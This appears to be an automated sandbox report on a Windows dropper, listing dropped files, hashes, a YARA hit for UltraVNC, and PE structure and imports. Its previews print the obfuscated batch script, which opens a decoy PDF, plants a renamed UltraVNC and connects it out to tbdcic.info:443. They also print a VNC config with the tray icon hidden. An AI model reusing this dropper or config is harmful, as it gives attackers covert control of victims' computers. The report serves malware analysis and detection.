Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\Downloads\Lom.pdf

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Windows\Tasks\4735396734841324

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.649012890742747
Encrypted:	false
SSDEEP:	24:g7JL6o/0aEMk4SH2ZckJeqIjq+JG4v/aJeqT2aJHfth439HJGVfx/m:8D/hL12q+K1HW39HSfx/m
MD5:	1BE7E5C957D00F505D8F9916CF850EE9
SHA1:	FB7573845F343A8ECA85451F1E2E58AFCEB0AC6B
SHA-256:	FCDED7D427BD65E160F5C792B38C5139B0C0B557F236B6F1D4636341F1E8BB32
SHA-512:	292DD30C40ED41E9F9335A5D0518F045629E6906FB4A51A4A4001F56BE9F393DD009E7D3B8DE04F83B1907B543716497603946818F931C6095E5C49B3006F8AA
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set vrh8AP=nhost.set muJYZp=nne.set BkbbBh=co.set MOaMlN=exe.set v0nVqH=Lom.set ZlYUDn=pdf.set UIS2A9=raVNC.set AHvFn8=%COMPUTERNAME%.set qVC5W0=autore.set WSmdXm=%WINDIR%\Tasks\144012088.cmd.set K7aM5W=tbdcic.info.set oSxXQL=TtF9ns.set sUWZqy=443.set XvryyK=co.set E3PqLw=ct.set RMGYdl=Ult.set jQMRAv=sync_browser.set WOH7MQ=ini.timeout /t 1.copy "ndymzn.PPYh2u" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%" & start "" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%".timeout /t 1.taskkill /f /im %jQMRAv%.%MOaMlN% .timeout /t 2.copy "Fgyxfc.Qnwi4I" "%jQMRAv%.%MOaMlN%".timeout /t 1.copy "B7MqI9.IYF1N0" "%RMGYdl%%UIS2A9%.%WOH7MQ%".timeout /t 2.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% .timeout /t 8.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% -%qVC5W0%%BkbbBh%%muJYZp%%E3PqLw% -id:%AHvFn8%_%oSxXQL% -%BkbbBh%%muJYZp%%E3PqLw% %K7aM5W%:%sUWZqy%.timeout /t 2.copy "Ivn55G.PqhJnU" "%XvryyK%%vrh8AP%.%MOaMlN%".timeout /t 4.:loop.if exist "%WSmdXm%" (. cmd /c "%WSmdXm%". tim

C:\Windows\Tasks\4735396734841324.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.649012890742747
Encrypted:	false
SSDEEP:	24:g7JL6o/0aEMk4SH2ZckJeqIjq+JG4v/aJeqT2aJHfth439HJGVfx/m:8D/hL12q+K1HW39HSfx/m
MD5:	1BE7E5C957D00F505D8F9916CF850EE9
SHA1:	FB7573845F343A8ECA85451F1E2E58AFCEB0AC6B
SHA-256:	FCDED7D427BD65E160F5C792B38C5139B0C0B557F236B6F1D4636341F1E8BB32
SHA-512:	292DD30C40ED41E9F9335A5D0518F045629E6906FB4A51A4A4001F56BE9F393DD009E7D3B8DE04F83B1907B543716497603946818F931C6095E5C49B3006F8AA
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set vrh8AP=nhost.set muJYZp=nne.set BkbbBh=co.set MOaMlN=exe.set v0nVqH=Lom.set ZlYUDn=pdf.set UIS2A9=raVNC.set AHvFn8=%COMPUTERNAME%.set qVC5W0=autore.set WSmdXm=%WINDIR%\Tasks\144012088.cmd.set K7aM5W=tbdcic.info.set oSxXQL=TtF9ns.set sUWZqy=443.set XvryyK=co.set E3PqLw=ct.set RMGYdl=Ult.set jQMRAv=sync_browser.set WOH7MQ=ini.timeout /t 1.copy "ndymzn.PPYh2u" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%" & start "" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%".timeout /t 1.taskkill /f /im %jQMRAv%.%MOaMlN% .timeout /t 2.copy "Fgyxfc.Qnwi4I" "%jQMRAv%.%MOaMlN%".timeout /t 1.copy "B7MqI9.IYF1N0" "%RMGYdl%%UIS2A9%.%WOH7MQ%".timeout /t 2.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% .timeout /t 8.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% -%qVC5W0%%BkbbBh%%muJYZp%%E3PqLw% -id:%AHvFn8%_%oSxXQL% -%BkbbBh%%muJYZp%%E3PqLw% %K7aM5W%:%sUWZqy%.timeout /t 2.copy "Ivn55G.PqhJnU" "%XvryyK%%vrh8AP%.%MOaMlN%".timeout /t 4.:loop.if exist "%WSmdXm%" (. cmd /c "%WSmdXm%". tim

C:\Windows\Tasks\B7MqI9.IYF1N0

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

C:\Windows\Tasks\Fgyxfc.Qnwi4I

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\Fgyxfc.Qnwi4I, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Windows\Tasks\Ivn55G.PqhJnU

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Windows\Tasks\UltraVNC.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

C:\Windows\Tasks\conhost.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Windows\Tasks\ndymzn.PPYh2u

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Windows\Tasks\sync_browser.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.954366715970979
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mSRW5AfJpC.exe
File size:	1'648'766 bytes
MD5:	95bb89ebdcec89e123e5647555d63aed
SHA1:	e7aa5b272cb301dfda33956a37aa9506d176e6ce
SHA256:	41a6e70e243bcded4033dc8050773fd3bd8870da995c4df2cba861bd2492e88c
SHA512:	3fc254cf08e8bcf40c64c27597ff999a4ea1cfe4d1abd0fe3902ec81f86abc800fca041fe5f554059f5373838e0a83403225a4d4ede4e604809b24e0bb0f7c16
SSDEEP:	24576:WKWs4oTukLOqd5AhJBMT6W6OoxHKVJxMl/5x9qpeZ8PNdzF77/voe2D7UGxxy+vy:TF6kqqLAdMT6W6O/rxM17z8dzZoe2DNA
TLSH:	24752345F681C9F0EEA3227050716D132BA3ED1E1A151DCF728CFA127931652BA2FA77
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................

File Icon


Icon Hash:	357561d6dad24d55

Static PE Info

General

Entrypoint:	0x41382f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1d1577d864d2da06952f7affd8635371

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00416E98h
push 004139C0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004151DCh]
pop ecx
or dword ptr [0041B9E4h], FFFFFFFFh
or dword ptr [0041B9E8h], FFFFFFFFh
call dword ptr [004151E0h]
mov ecx, dword ptr [004199C4h]
mov dword ptr [eax], ecx
call dword ptr [004151E4h]
mov ecx, dword ptr [004199C0h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004151E8h]
mov eax, dword ptr [eax]
mov dword ptr [0041B9E0h], eax
call 00007FC740E6BD12h
cmp dword ptr [00419780h], ebx
jne 00007FC740E6BBFEh
push 004139B8h
call dword ptr [004151ECh]
pop ecx
call 00007FC740E6BCE4h
push 00419050h
push 0041904Ch
call 00007FC740E6BCCFh
mov eax, dword ptr [004199BCh]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [004199B8h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004151F4h]
push 00419048h
push 00419000h
call 00007FC740E6BC9Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17324	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0x309f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x364	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x130f0	0x13200	a86014994324ad6f47bddf386fd89176	False	0.6081495098039216	data	6.614408281478693	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x3560	0x3600	9abc217bd20b39b1db2f57ddf9bc789c	False	0.4381510416666667	data	5.5938980842785995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x29ec	0x800	4c129856aeef51c872b4a2f6db01e9bd	False	0.44580078125	data	3.8126171673069433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1c000	0x309f0	0x30a00	70476287931779f9a3d21275cc034d80	False	0.7721621947300771	data	7.423399046641766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1c280	0x18de	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia	0.9696826892868363
RT_ICON	0x1db60	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Russian	Russia	0.08974964572508266
RT_ICON	0x21d88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Russian	Russia	0.12935684647302906
RT_ICON	0x24330	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720	Russian	Russia	0.16553254437869822
RT_ICON	0x25d98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Russian	Russia	0.21106941838649157
RT_ICON	0x26e40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Russian	Russia	0.29508196721311475
RT_ICON	0x277c8	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1680	Russian	Russia	0.33313953488372094
RT_ICON	0x27e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia	0.4592198581560284
RT_GROUP_ICON	0x282e8	0x76	data	Russian	Russia	0.7457627118644068
RT_VERSION	0x28360	0x350	data			0.4693396226415094
RT_MANIFEST	0x286b0	0x33c	ASCII text, with CRLF line terminators	English	United States	0.501207729468599

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	SysAllocString, VariantClear, OleLoadPicture
KERNEL32.dll	SetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
